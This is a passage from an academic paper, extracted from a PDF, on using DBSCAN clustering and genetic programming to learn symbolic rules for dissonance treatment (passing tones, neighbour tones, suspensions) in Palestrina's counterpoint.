composition before. Spector & Alpern (1994) propose a system that automatically generates computer programmes for composing four-measure bebop jazz melodies. The generated programmes combine a number of given functions, inspired by Jazz literature, that transform short melodies from Charlie Parker in various ways. The fitness of each programme is evaluated by a set of restrictions inspired by Baker (1988), which measure the balance of different aspects (e.g. tonal and rhythmic novelty). Johanson & Poli (1998) also propose a system that creates computer programmes for transforming short melodies, but they allow users to interactively rate the quality of the generated music. This proved a tedious process for users. Therefore they complement the user-rating with automatic fitness raters that learn from the user ratings. Previous applications of GP for music composition thus aimed at modelling the full composition process, where the fitness function had to judge the quality of the resulting music. Yet, the programmes resulting from the evolutionary algorithm are rather short, and they are thus limited in the compositional knowledge they can represent. Previous work therefore composed music by transforming pre-existing music. Instead, we are interested in learning compositional rules with GP that describe only a certain aspect of the resulting music. Such rules are relevant in their own right as a representation of compositional knowledge that can be complemented with further Anders and Inden (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.244 3/19 http://dx.doi.org/10.7717/peerj-cs.244 https://peerj.com/computer-science/ musical knowledge, for example, in music constraint programming systems with manually encoded musical rules. In this situation, the fitness function does not need to judge musical quality. Instead, it only needs to estimate how well the resulting rule fits the given positive examples and avoids the negative examples. As far as we know, GP has not yet been used for learning symbolic compositional rules, and therefore in this study we focus on a relatively well understood class of rules. Dissonances in Palestrina’s music This project studies the dissonance treatment in Palestrina counterpoint with ML by automatically generating multiple symbolic rules that each constrain the treatment of a specific dissonance category (passing tones, suspensions etc.). Jeppesen (1946), the seminal authority on Palestrina counterpoint, distinguishes three roles a dissonance can play in his music. Some dissonances are hardly noticeable on a weak beat used for connecting notes in smooth melodic lines (Jeppesen calls them dissonances as a secondary phenomenon); others occur at an accented beat and are clearly heard (dissonances as primary phenomenon); and finally—more rarely—dissonances can be used for an expressive effect. As an example, Fig. 1 shows an excerpt from a Palestrina mass movement1 with several dissonance categories in close proximity. All dissonances are marked with a crossed notehead, and are labelled with their dissonance category. Passing tones (p.t.) and neighbour tones (n.t.) are short notes on a weak beat that link melodic tones (secondary phenomenon). By contrast, suspensions (s.) stand out; they occur on a strong beat and typically at longer notes. The five standard dissonance categories taught in Palestrina counterpoint classes are passing tone, neighbour tone, suspension, anticipation and cambiata (Jeppesen, 1939). Traditionally, these categories are introduced progressively in class for pedagogic reasons in so-called species counterpoint, for example, in the 1725 textbook by Fux (1965), which is still widely used. Figure 1 Palestrina excerpt with several dissonances: several passing tones (p.t.), a neighbour tone (n.t.), and a suspension (s.), from the Agnus of missa De Beata Marie Virginis (II), measures 24–26. Full-size DOI: 10.7717/peerj-cs.244/fig-1 1 The excerpt is from the Agnus of missa De Beata Marie Virginis (II), which is Agnus_0.krn in the music21 corpus, and stems from Humdrum. See also footnote 3. Anders and Inden (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.244 4/19 http://dx.doi.org/10.7717/peerj-cs.244/fig-1 http://dx.doi.org/10.7717/peerj-cs.244 https://peerj.com/computer-science/ An algorithm for automatically identifying dissonances in Renaissance counterpoint has been proposed by Patrick & Strickler (1978), but it implements knowledge on the standard dissonance categories and therefore we instead developed a custom algorithm. The actual music of Palestrina contains further dissonance categories, as shown by computational analysis (Sigler, Wild & Handelman, 2015). Counterpoint composition has often been modelled in a rule-based way, together with the relevant dissonance treatment. Already the 1957 composition Illiac Suite, commonly recognised as the first computer-generated composition, implemented for its second experiment and movement four-part first species counterpoint with rules similar to Renaissance counterpoint rules (Hiller & Isaacson, 1993). As a model for first species counterpoint, this early work sidestepped the issue of dissonance treatment, though, by simply not allowing for any dissonances. Ebcioglu (1980) proposed a system that implemented two-part florid counterpoint to a given cantus firmus with rules inspired by Renaissance counterpoint that stem from Joseph Marx and Charles Koechlin and are complemented by rules of the author. Standard dissonance categories like passing tones, neighbour tones and suspensions are implemented, and published results attest to the musical quality of the output. Schottstaedt (1989) followed the Palestrina counterpoint rules of Fux (1965) very faithfully and implemented all of Fux’ five species for up to six voices with own rules added to get closer to Fux’ actual examples. METHODS For learning symbolic compositional rules we use a novel methodology that combines multiple established approaches. At first, dissonant notes are automatically labelled in a corpus of music by Palestrina with a custom algorithm. These dissonances are then automatically clustered into different dissonance categories (passing notes, suspensions etc.) with the clustering algorithm DBSCAN (Ester et al., 1996). Finally, a rule is learnt for each of these categories with GP. Each rule states conditions that must hold between three consecutive melodic notes if the middle note is a dissonance. The rest of this section describes each of these steps in more detail. Annotation of dissonances A custom algorithm for dissonance detection in Renaissance music As a first step we automatically label dissonances in the music using a custom algorithm implemented with the music analysis environment music21 (Cuthbert & Ariza, 2010). For our purposes, it is better for the algorithm to leave a few complex dissonance categories undetected than to wrongly mark notes as dissonances that are actually not dissonant. Note that this algorithm does not implement any knowledge of the dissonance categories known to occur in Palestrina’s music. The analysis first ‘chordifies’ the score, that is, it creates a homorhythmic chord progression where a new chord starts whenever one or more notes start in the score, and each chord contains all the score notes sounding at that time. The result of the ‘chordification’ process on its own would loose all voice leading information (e.g. where voice crossing happens), but our algorithm processes those chords and the original Anders and Inden (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.244 5/19 http://dx.doi.org/10.7717/peerj-cs.244 https://peerj.com/computer-science/ polyphonic score in parallel and therefore such information is retained. The algorithm tracks which score notes form which chord by accessing the notes with the same start time (music21 parameter offset) as a given chord. The algorithm then loops through the chords. If a dissonant chord is found,2 it tries to find which note(s) make it dissonant by testing whether the chord becomes consonant if the pitches of these note(s) are removed. Dissonances are more likely to occur on short notes in Palestrina, and sometimes multiple dissonant tones occur simultaneously. The algorithm tests whether individual notes (and pairs of simultaneously moving notes) are dissonant. The algorithm progresses in an order that depends on the notes’ duration and a parameter max pair dur, which specifies the maximum duration of note pairs tested (in our analysis max pair dur equalled to a half note). In order to minimise mislabelling dissonances, the algorithm first tests all individual notes with a duration up to max pair dur in increasing order of their duration; then all note pairs in increasing order of their duration; and finally remaining individual notes in order of increasing duration. Suspensions are treated with special care. Remember that the algorithm processes the ‘chordified’ score and the actual score in parallel. As a preprocessing step, the algorithm merges tied score notes into single notes to simplify their handling. When the algorithm then loops through the chords and finds a dissonant note that started before the currently tested chord, it splits that note into two tied notes, and only the second note starting with the current chord is marked as dissonant. In order to avoid marking notes wrongly as dissonances, the algorithm does not test the following cases: any note longer than max diss dur, a given maximum dissonance duration (we set it to a whole note); and any suspension where the dissonant part of the note would exceed the preceding consonant part, or it would exceed max diss dur. For this pilot we arbitrarily selected the first 36 Agnus mass movements from the full corpus of Palestrina music that ships with music21.3 All examples in that subcorpus happen to be in 42 ‘metre’ (tempus imperfectum, denoted with cut half circle), but our method does not depend on that. Evaluation of the dissonance detection algorithm We evaluated results by manually ‘eyeballing’ a sample of scores with marked dissonances. The dissonance detection appears to work rather well; only very few notes were found wrongly labelled as a dissonance during our manual examination.4 Figure 1 shows an example where dissonances would not be correctly labelled by our algorithm. The first two passing tones (eighth notes) are correctly labelled in Fig. 1, but our algorithm would instead label the D in the soprano as a dissonance. The problem here is that when the two correct dissonances are removed, the resulting ‘chord’ A–D is a fourth, which is still considered a dissonance in Renaissance music. Instead, if the soprano D is removed, the remaining chord C–A happens to be consonant. Also, sometimes a suspension is not correctly recognised and instead a wrong note is labelled, where the voice proceeds by a skip in shorter notes. 2 A dissonant chord is any chord for which music21’s Chord.isConsonant() returns false. That function checks for two pitches whether the interval is a major or minor third, sixth or perfect fifth, and for three pitches whether the chord is a major or minor triad that is not in second inversion. 3 Casimiri edition (Da Palestrina, 1939), encoded by John Miller and converted to Humdrum by Bret Aarden. 4 Unfortunately, we have no way to auto- matically estimate the quality of our dissonance detection. Nevertheless, the interested reader can confirm in music notation the quality of the dissonance detection by examining the results in the data for this paper (available under digital object identifier (DOI) 10.5281/zenodo.2653502) in the folder Preprocessing Results, which includes MusicXML files of all pieces we used, and where detected dissonances are marked by x-shaped note heads. Anders and Inden (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.244 6/19 https://doi.org/10.5281/zenodo.2653502 http://dx.doi.org/10.7717/peerj-cs.244 https://peerj.com/computer-science/ To be on the safe side for our purposes of learning dissonance treatment, the algorithm therefore does not label all dissonances. For example, occasionally more than two dissonances occur simultaneously in Palestrina, for example, when three parts move with the same short rhythmic values or in a counterpoint of more than four voices. If the algorithm does not find tones that, when removed, leave a consonant chord, then no note is labelled as a dissonance (though the chord is marked for proofreading). Excluding dissonances with the parameter max diss dur avoided a considerable number of complex cases and otherwise wrongly labelled notes.5 Due to these precautions (avoiding wrongly labelled dissonances), due to the corpus (selected Agnus movements) and the frequency of certain dissonance categories in that corpus, only a subset of the standard dissonance categories were detected and learnt as rules in this project (see Table 1). This point is further discussed below in the section on the evaluation of the clustering. Also, because the wrongly labelled dissonances are relatively rare and do not show regular patterns, the cluster analysis sorts these cases into an outlier category, which we did not use for rule learning, further improving the quality of the marked dissonance collections. Data given to machine learning Instead of handing the ML algorithm only basic score information (e.g. note pitches and rhythmic values), we provide it with background knowledge (like melodic intervals and accent weights as described below), and that way guide the search process. For flexibility, we considered letting the ML algorithm directly access the music21 score data with a set of given interface functions (methods), but extracting relevant score information in advance is more efficient. Once dissonances are annotated in the score, only melodic data is needed for the clustering and later the ML. For simplicity we only used dissonances surrounded by two consonant notes (i.e. no consecutive dissonances like cambiatas). In order to control the differences in ‘key’ between pieces in the corpus, our algorithm computes ‘normalised pitch classes’, where 0 is the tonic of the piece, 1 a semitone above the tonic and so forth. For this purpose we need to compute the ‘key’ of each piece. We are not aware of any algorithm designed for classifying Renaissance modes, and we therefore settled on instead using the Krumhansl-Schmuckler key determination algorithm (Krumhansl, 1990) with simple key correlation weightings by Sapp (2011). Table 1 The features of the automatically derived clusters match traditional dissonance categories. Cluster Dissonance category 1st interval 2nd interval Metric position Duration C0 Passing tones down Step down Step down Weak beat Up to half note C1 Passing tones up Step up Step up Weak beat Up to half note C2 Suspension on beat 3 Repetition Step down Strong beat 3 Quarter or half note C3 Suspension on beat 1 Repetition Step down Very strong beat 1 Quarter or half note C4 Lower neighbour tone Step down Step up Weak beat Up to half note 5 Interested readers can investigate the unlabelled dissonances in music nota- tion. In the MusicXML files mentioned in the previous footnote, the result of the ‘chordification’ process is included as an additional stave and all dissonances are always labelled in that stave. If the staves of the actual voices do not contain any simultaneous note with x-shaped note head, then that dissonance is not labelled in the score. Anders and Inden (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.244 7/19 http://dx.doi.org/10.7717/peerj-cs.244 https://peerj.com/computer-science/ While this approach is not able to recognise modes, it is at least able to control the differences in accidentals between pieces.6 We determine accent weights using music21’s function getAccentWeight, where the strongest beat on the first beat of a measure has the weight 1.0; strong beats within a measure (e.g. the third beat in 42 ‘metre’) the weight 0.5; the second and fourth beat in 4 2 metre the weight 0.25 and so on (Ariza & Cuthbert, 2010). Intervals are measured in semitones, and durations in quarter note lengths of music21, where 1 means a quarter note, 2 a half note and so on. For simplicity we left ties out in this pilot. Suspensions are simply repeated tones, they are not tied over. Cluster analysis of dissonance categories Analysis With DBSCAN algorithm For each dissonance, we provide the clustering algorithm with the following features: the sum of the durations of the previous, current, and next note (the reason for including this feature instead of including all note durations is explained in the following ‘Discussion’ section); the melodic interval from the previous note (measured in semitones), and the interval to the next note; the ‘normalised’ pitch class of the dissonance (i.e. 0 is the ‘tonic’ etc.); and the accent weight of the dissonance. Before clustering, all data for each feature is normalised such that its mean is 0.0 and its standard deviation is 1.0. The data is clustered using the DBSCAN algorithm (Ester et al., 1996) as implemented in the scikit-learn library (Pedregosa et al., 2011). This clustering algorithm does not require setting the number of clusters in advance, and can find clusters of arbitrary shape as it is based on the density of points. Here, we set the minimum number of neighbours required to identify a point as a core cluster point to 10, and the maximum neighbour distance to 0.7 based on initial runs and the desire to keep the number of clusters in a reasonable range. Points that lie in low density regions of the sample space are recognised as outliers by DBSCAN, and are ignored in the subsequent rule learning step. Clustering results and discussion In order to evaluate the clustering results, we automatically labelled each dissonance in the score with its dissonance category (cluster number), and then created a new score for each cluster number into which all short melodic score snippets that contain this dissonance were collected (one-measure snippets, except where the dissonance occurs at measure boundaries). We then evaluated the clustering results by eyeballing those collections of score snippets7. Initially, the importance of note durations for the clustering was rated too highly, because the clustering took more duration parameters into account (one for every note) than other parameters (e.g. pitch intervals between notes). As a result, one cluster contained primarily dissonances at half notes and another dissonances at shorter notes, which was not useful for our purposes. Therefore, we aggregated the duration information, and adjusted the DBSCAN parameters as described above, after which clustering worked very well. 6 As future work, it might be worth exploring whether the low-complexity weights that Sapp proposed for major and minor—basically assigning 0 to all non-scale degrees and 1 to all scale degrees, but 2 to the tonic and fifth— could be adapted for Renaissance modes by assigning 2 to their respective tonics (and the fifths as appropriate). 7 The clustering results, along with all algorithms created, can also be found in the Supplemental Data, DOI: 10.5281/zenodo.2653502. Anders and Inden (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.244 8/19 https://doi.org/10.5281/zenodo.2653502 http://dx.doi.org/10.7717/peerj-cs.244 https://peerj.com/computer-science/ In the selected corpus only the following main dissonance categories are found: passing tones downwards on a weak beat (863 cases); passing tones upwards on a weak beat (643 cases); suspensions on the strong beat 3 in 42 ‘metre’ (313 cases); suspensions on the strong beat 1 (265 cases); and lower neighbour tones on a weak beat (230 cases). Table 1 summarises the distinguishing features of the dissonance categories as found in clusters C0–C4, for which we learnt rules. Each row in the table describes a separate dissonance category as recognised by the clustering algorithm. The first interval indicates the melodic interval into the dissonance, and the second the interval from the dissonance to the next note. Metric position and duration are features of the dissonant note itself. Other dissonance categories like upper neighbour tones, anticipations and cambiatas do not occur in the ML training set. Either they do not exist in the first 36 Agnus mass movements of the music21 Palestrina corpus that we used, or they were excluded in some way. We only use dissonances surrounded by consonances (which excludes cambiatas). Also, we did not use the set of outliers (189 cases), which as expected, has no easily discernible common pattern. Among these outliers are wrongly labelled dissonances, upper neighbour tones, and a few further cases of the above main categories. There are also two small further clusters with lower neighbour tones (C5, 25 cases), and passing tones upwards (C6, 11 cases) that were discarded as they were considered to be too small, and cover categories that are already covered by larger clusters. Learning of rules Training set To initiate rule learning, our algorithm compiles for each identified cluster (dissonance category) a set of three-note-long learning examples with a dissonance as middle note. All dissonances that have been assigned to that particular cluster are used as positive examples. Then, four sets of negative examples are generated. Note that the generation of negative examples does not take any knowledge about the problem domain into account. A similar approach can also be used for learning rules on other musical aspects. The first set is a random sample of dissonances that have been assigned to other clusters. The second set is a random sample of three-tone-examples without any dissonance taken from the corpus. The third set consists of examples where all features are set to random values drawn from a uniform distribution over the range of possible values for each feature. The fourth set consists of slightly modified random samples from the set of positive examples. Two variations are generated for each chosen example. Firstly, either the interval between the dissonant tone and the previous note or the interval to the next note is changed by ±2 semitones (with equal probabilities). Secondly, one of the three note durations is either halved or doubled (with equal probabilities). Both modifications are stored separately in the fourth set of negative examples. The algorithm aims to create 20% of the number of positive examples for each set of negative examples, but will generate at least 200 examples (100 for the first set due to possible low availability of these examples) and at most 500. These numbers represent Anders and Inden (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.244 9/19 http://dx.doi.org/10.7717/peerj-cs.244 https://peerj.com/computer-science/ mostly a trade-off between accuracy of training/measurement and computation time, and we expect a similar performance if these values are changed within reasonable ranges. Once all example sets have been constructed, each example receives a weight such that the total weight of the positive examples is 1.0, and the total weight of each of the four sets of negative examples is 0.25 (within each set, the weights are the same for all examples). When measuring classification accuracy of a rule during the learning process, each positive example that is classified correctly counts +1 times the example weight, whereas each negative example that is erroneously classified as positive example counts −1 times the example weight. Thus, the accuracy score is a number between −1.0 and 1.0, with 0.0 expected for a random classifier. Please note that with a low probability a randomly generated negative example can be the same as a positive example. Here, we consider this as a small amount of noise in the measurement, but for future experiments it is possible to filter these out at the expense of run time. Learning process We use strongly typed GP as implemented in the Python library DEAP (https://github. com/deap/deap) (Fortin et al., 2012) with the types float and Boolean (integers are translated to floats). The following functions can occur as parent nodes in the tree that represents a learnt rule. Logical operators: _ (or), ^ (and), : (not), ! (implication), $ (equivalence) Arithmetic operators and relations: þ, �, � (multiplication), = (division), � (unary minus), ¼, <, > Conditional: if then elseðhbooleani, hfloati, hfloatiÞ Terminal nodes in a ‘rule tree’ can be either input variables (like the duration of a note or the interval to its predecessor or successor) or ephemeral random constants (constants whose values can be changed by mutations). The following input variables can be used in the learnt rules: the duration of the dissonant note (durationi), its predecessor (durationi�1) and successor (durationiþ1); the normalised pitch class of the dissonance; the intervals8 between the dissonance and its predecessor (intervalpre) and successor (intervalsucc); and the accent weight of the dissonance (accentWeighti). As for the ephemeral random constants, there are the Boolean constants true and false, as well as integer constants in the form of values between 0 and 13. The notation given here is the notation shown later in learnt rule examples. There are many choices of operators and parameters that can be used with GP. Here, we follow standard approaches that are commonly used in the GP practitioners’ community, and/or are DEAP defaults, unless otherwise noted. The population is created using ramped half-and-half initialisation, after which at each generation the following operators are applied. For selection, we use tournament selection with a tournament size of 3. For mutation, there is a choice between three operators: standard random tree mutation (95% probability), a duplication operator that creates two copies of the tree and connects them using the ^ operator (2.5%), and a similar duplication operator using the 8 A melodic interval is always computed as the interval between a given note and its predecessor and positive when the next note is higher. Anders and Inden (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.244 10/19 https://github.com/deap/deap https://github.com/deap/deap http://dx.doi.org/10.7717/peerj-cs.244 https://peerj.com/computer-science/ _ operator (2.5%). For recombination, there is again a choice between standard tree exchange crossover (95%), an operator that returns the first individual unchanged, and a combination of the first and second individual using the ^ operator (2.5%), and a similar operator using _ (2.5%). While random tree mutation and tree exchange crossover are commonly used, we designed the other operators to encourage the emergence of rules that are conjunctions or disjunctions of more simple rules, which is a useful format for formal compositional rules. Without these operators, it would be extremely unlikely that a new simple rule could be evolved without disrupting the already evolved one, or that different already evolved rules could be combined as a whole. A static depth limit of 25 is imposed on the evolving trees to avoid stack overflows and exceedingly long execution times. A population of 100 individuals is evolved for 1,000 generations. The fitness assigned to an individual is 10 times its accuracy score (described above) minus 0.001 times the size of its tree. That way, among two rules with equal classification accuracy, the more compact rule has a slight fitness advantage. We introduced this as a measure to slow down the growth of the trees during evolution (known as ‘bloat control’ in the field of GP, although the effect of this particular measure is not very strong). We performed five runs for every cluster. They use the same set of learning examples, but find different rules nonetheless due to the stochastic nature of GP. After a run is finished, the best rule evolved in that run is output together with its classification accuracy scores9. RESULTS Quantitative evaluation The quality of the rule learning process as implemented by GP is evaluated by measuring the accuracies of the best evolved rules (see Fig. 2). It can be seen that the accuracies for positive examples are better than 98% in most cases, the accuracies on negative examples from other clusters are mostly better than 99%, the accuracies on negative examples without dissonances are mostly better than 94%, the accuracies on random counterexamples are close to 100%, and the accuracies for modified positive examples are mostly better than 94% but around 89% for the first cluster. When plotting overall accuracy scores against the sizes of the rules’ corresponding GP trees (Fig. 3), it can be seen that rules for the same cluster achieve similar accuracy scores despite different sizes. However, across clusters, there seems to be a negative correlation between accuracy and rule size. The most plausible explanation seems to be that larger clusters are more difficult to describe, resulting both in larger rule sizes and lower accuracy scores (Fig. 4). The accuracy of some negative examples (i.e. examples without dissonances, and modified positive examples) might be lower, because some of them may accidentally match the pattern of positive examples. Qualitative evaluation We evaluated the suitability of the evolved rules for describing dissonances by using them as melodic constraints in small constraint problems implemented with the music constraint system Cluster Engine (http://github.com/tanders/clusterengine), which is a 9 The evolved rules from all runs, together with their qualitative evaluatiuon, can be found in the file ‘Resulting rules.pdf’ in the Supplemental Data, DOI: 10.5281/zenodo.2653502. Anders and Inden (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.244 11/19 http://github.com/tanders/clusterengine https://doi.org/10.5281/zenodo.2653502 http://dx.doi.org/10.7717/peerj-cs.244 https://peerj.com/computer-science/ Figure 2 Accuracies achieved by the champions of the genetic programming runs on the various parts of the training set. (A) postive examples; (B) counterexamples from other clusters; (C) harmonic counterexamples; (D) random counterexamples; (E) randomly modified positive examples. The means are indicated by blue bars. C0–C6 denotes the clusters found by DBSCAN. These clusters correspond to different dissonance categories (see Table 1). C5 and C6 are two small clusters that were disregarded in the end (see discussion at the end of section ‘Clustering Results and Discussion’ above). Full-size DOI: 10.7717/peerj-cs.244/fig-2 Anders and Inden (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.244 12/19 http://dx.doi.org/10.7717/peerj-cs.244/fig-2 http://dx.doi.org/10.7717/peerj-cs.244 https://peerj.com/computer-science/ revision of the solver PWMC (Sandred, 2010). Both these solvers are libraries of the visual programming and composition environment PWGL (Laurson, Kuuskankare & Norilo, 2009). The constraint problems consist of only three notes with the middle note as the dissonance and surrounding rests as padding so that these notes can occur freely on any beat. For each learnt rule (five per cluster resulting from the five runs reported above) we generated 15 random solutions (an arbitrary number). We examined these solutions in common music notation, and appraised how well they complied with the respective dissonance category. Specifically, we checked whether the metric position and duration of the middle note (the dissonance) and the melodic intervals into and from this note are appropriate. Figure 3 Accuracy score vs tree size for the evolved solutions from all runs. Clusters are denoted by their respective numbers. Full-size DOI: 10.7717/peerj-cs.244/fig-3 Figure 4 Accuracy score (A) and tree size (B) vs cluster size. Clusters are denoted by their respective numbers. Full-size DOI: 10.7717/peerj-cs.244/fig-4 Anders and Inden (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.244 13/19 http://dx.doi.org/10.7717/peerj-cs.244/fig-3 http://dx.doi.org/10.7717/peerj-cs.244/fig-4 http://dx.doi.org/10.7717/peerj-cs.244 https://peerj.com/computer-science/ For each cluster (dissonance category) at least one learnt rule constrains the treatment of the dissonant middle note in a way that either fully complies with the features of the corresponding positive examples (see Table 1 again), or is at least very close. In other words, this ‘best rule’ per cluster works either perfectly or at least rather well when used as a constraint for its dissonance category. Table 2 shows how accurate the best rule of each dissonance category is by reporting the greatest deviation found in any solution among a set of 15 random solutions. The full qualitative evaluation results—together with the raw rule results—are available with the data provided with this paper (under Resulting Rules and Evaluation). Examples of learnt rules To give a better idea of the kind of rules learnt, Figs. 5 and 6 show two examples. The rule of Fig. 5 constrains passing tones upwards and that of Fig. 6 suspensions on beat 1. These specific rules have been selected, because they are relatively short. Both rules are the best out of their set of 5 in the sense just discussed above, and the qualitative evaluation of their results is included in Table 2. The rules generated by DEAP were slightly simplified manually and with Mathematica, and translated into standard mathematical notation for clarity. Table 2 Qualitative evaluation summary: greatest deviation found between features of positive examples (see Table 1) and solutions to best rule for each cluster. Cluster Category 1st interval 2nd interval Metric position Duration C0 Passing tones down None None None None C1 Passing tones up None None None None C2 Suspension on beat 3 None None None Smalla C3 Suspension on beat 1 Smallb None None Smalla C4 Lower neighbour tone Smallc None None None Notes: a Rule also allows for eighth note (ideally it would only allow for a quarter or half note). b Rule also allows for a minor second down (ideally it would only allow for pitch repetition). c Rule also allows for a repetition (ideally it would only allow for a downward step). durationi−1 < durationi + 3 (1) ∧ accentWeighti < 0.5 (2) ∧ 6 · accentWeighti < durationi−1 (3) ∧ accentWeighti < intervalpre (4) ∧ accentWeighti < intervalsucc (5) ∧ durationi < 3 (6) ∧ accentWeighti · durationi+1 < durationi (7) ∧ intervalpre < 3 (8) ∧ intervalsucc < 3 (9) Figure 5 Learnt rule example from C1: passing tones upwards. Full-size DOI: 10.7717/peerj-cs.244/fig-5 Anders and Inden (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.244 14/19 http://dx.doi.org/10.7717/peerj-cs.244/fig-5 http://dx.doi.org/10.7717/peerj-cs.244 https://peerj.com/computer-science/ As an example, let us analyse the first rule, which constraints upwards passing tones (Fig. 5). The other rule in Fig. 6 can be analysed similarly. Remember that for this dissonance category the dissonance occurs on a weak beat, both intervals lead upwards stepwise, and its duration is up to a half note (Table 1). This rule constrains all those aspects exactly (Table 2). The names of the input variables and their possible values have been explained above,10 but we will briefly revise them below for the reader’s convenience. Note that the learnt rules contain some bloat—expressions that are irrelevant or redundant. In our analysis we will focus on the meaningful expressions of the rule. Remember that each rule states conditions that must hold between three consecutive melodic notes if the middle note is a dissonance. The dissonance occurs on the note with the index i, for example, accentWeighti is the accent weight of the dissonance. The rule in Fig. 5 constrains dissonances to a weak beat. For the first beat of a measure, the accent weight is 1.0, for the third beat in 42 it is 0.5, of the second and forth beat it is 0.25 and so on. The rule constrains accentWeighti—the weight of the dissonance—to less than 0.5, that is, to a weak beat, see line (2) of the rule. The rule enforces that both the melodic interval into the dissonance and out of it, intervalpre and intervalsucc (measured in semitones) are positive (upwards). The rule happens to express this by constraining that these intervals are greater than accentWeighti, see Eqs. (4) and (5), and accentWeighti is always greater than 0 by its definition. Both intervals are less than 3, see Eqs. (8) and (9). So, in summary the intervals are positive (upwards), but at most two semitones (steps). The duration must be a half note or shorter. Durations are measured in music21’s quarterlengths, where 1 represents a quarter note. The duration of the dissonance must be less than 3, which corresponds to a dotted half note (6), hence it can be a half note at most. DISCUSSION During the course of our project we gradually improved the resulting rules. The negative examples in the training set for the rule learning have a great impact on the accuracy of resulting rules. For example, the inclusion of slightly modified transformations of positive examples clearly improved the accuracy as compared to preliminary experiments. A closer investigation into the impact of automatically generated negative examples on the accuracy of resulting rules could lead to further improvement. For example, so far we only used slight random variations of the note durations and melodic intervals to 2 ≥ |intervalsucc| ∧ accentWeighti ≥ 1 ∧ (2 < durationi ∨ durationi−1 ≥ 2) ∧ (2 ≥ durationi ∨ durationi−1 < 2) ∧ intervalpre < accentWeighti ∧ intervalpre > intervalsucc Figure 6 Learnt rule example from C3: suspension on beat 1. Full-size DOI: 10.7717/peerj-cs.244/fig-6 10 The variable names where introduced above when discussing terminal nodes in the subsection ‘Learning process’ and their possible values earlier in the sub- section ‘Data given to machine learning’. Anders and Inden (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.244 15/19 http://dx.doi.org/10.7717/peerj-cs.244/fig-6 http://dx.doi.org/10.7717/peerj-cs.244 https://peerj.com/computer-science/ generate negative examples, but variations of further parameters could also be useful (e.g. negative examples with shifted metric positions could also restrict syncopations). Multiple rules learnt for the same cluster differ in their accuracy when used as a constraint for music generation: the music generated with these rules (during qualitative evaluation) can be more or less close to the features of the positive examples (see Table 1). Table 2 only reports the accuracy of the best rule per cluster. Some other rules for the same cluster are much less accurate, but nevertheless obtain a very similar overall weighted score in the learning process. Currently, we lack an algorithm for measuring the accuracy of a rule in terms of how similar generated music restricted by that rule is compared with its positive examples. Such an algorithm would be very useful to contribute to the fitness calculation of rules during the learning process. The accuracy of resulting rules can also be improved by taking further background knowledge into account. For example, some resulting rules allow for syncopations in dissonance categories where these would not occur in Palestrina, for example, at a passing tone. Providing the rule learning algorithm with an extra Boolean feature whether the dissonant note is syncopated or not will likely avoid that. A further improvement could probably be obtained by post-processing large clusters generated by DBSCAN with another clustering algorithm that is not based on density alone, or by DBSCAN with a smaller setting for maximum neighbour distance, to split them up into smaller clusters, for which learning a suitable rule should be easier. From the perspective of GP research, we demonstrate a simple yet powerful way of performing symbolic regression on heterogeneous data. A combination of GP and clustering is used to achieve that. These two techniques have occasionally been used together for various purposes. Some similarity to our approach can be found in the work by Kattan, Agapitos & Poli (2010), who use a top-level genetic programmming system to project data from a complex problem domain onto a two-dimensional space, then apply k-means clustering several times with different target cluster numbers to subdivide the problem set, then use the best clustering (as determined by a clustering quality measure) to run a lower level GP system on each cluster. This method was introduced against a background of techniques other than clustering that had already been applied to what is termed problem decomposition for GP. The authors demonstrate superior performance on a set of benchmarks problems against GP without clustering. Later, Kattan, Fatima & Arif (2015) extend this approach for event prediction in time series. By using a density based clustering algorithm, and applying it directly on the input data, we achieve something similar with a much simpler system. This is partly due to the fact that the density parameter is not difficult to set. Of course, if it were more difficult to set, clustering quality metrics could also be used for that purpose along with the manual evaluation of clustering quality based on domain knowledge that we have applied here. CONCLUSIONS Human composition education and composition practice commonly combine guidance from compositional rules and insights learnt from musical examples. By contrast, while rule-based approaches on the one hand, and approaches based on ML on the other hand Anders and Inden (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.244 16/19 http://dx.doi.org/10.7717/peerj-cs.244 https://peerj.com/computer-science/ have been often employed in the field of algorithmic composition, these approaches have rarely been combined. In this paper, we propose a method that automatically extracts symbolic compositional rules from a music corpus. This method is based on GP, a ML technique using an evolutionary algorithm. The resulting rules can be analysed by humans or used in rule- based algorithmic composition systems. In this study, we extracted rules that detail the dissonance treatment in compositions by Palestrina. We derived rules for the following five dissonance categories (automatically derived clusters): passing tones on a weak beat upwards and downwards; lower neighbour tones on a weak beat; and suspensions on the strong beat one and beat three in 42 ‘metre’. Learnt rules typically match between 98% and 99% of the positive training examples, while excluding between 89% and 100% of the counterexamples depending on counterexample category and cluster (dissonance category), with better results for smaller clusters. Learnt rules describe melodic features of the dissonance categories very well, though some of the resulting best rules allow for minor deviations compared with the positive examples (e.g. allowing the dissonance category of suspension to occur on shorter notes as well). ACKNOWLEDGEMENTS We want to thank Dmitri Tymoczko, who suggested the initial idea for an algorithm that detects dissonances in Renaissance music. We are also grateful for the detailed and valuable feedback of two reviewers. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare that they have no competing interests. Author Contributions � Torsten Anders conceived and designed the experiments, performed the experiments, analysed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � Benjamin Inden conceived and designed the experiments, performed the experiments, analysed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: Torsten Anders, & Benjamin Inden. (2019, October 17). Supplemental files for article: Machine learning of symbolic compositional rules with genetic programming: Dissonance treatment in Palestrina. Zenodo. DOI 10.5281/zenodo.3538295. Anders and Inden (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.244 17/19 http://doi.org/10.5281/zenodo.3538295 http://dx.doi.org/10.7717/peerj-cs.244 https://peerj.com/computer-science/ REFERENCES Anders T, Miranda ER. 2011. 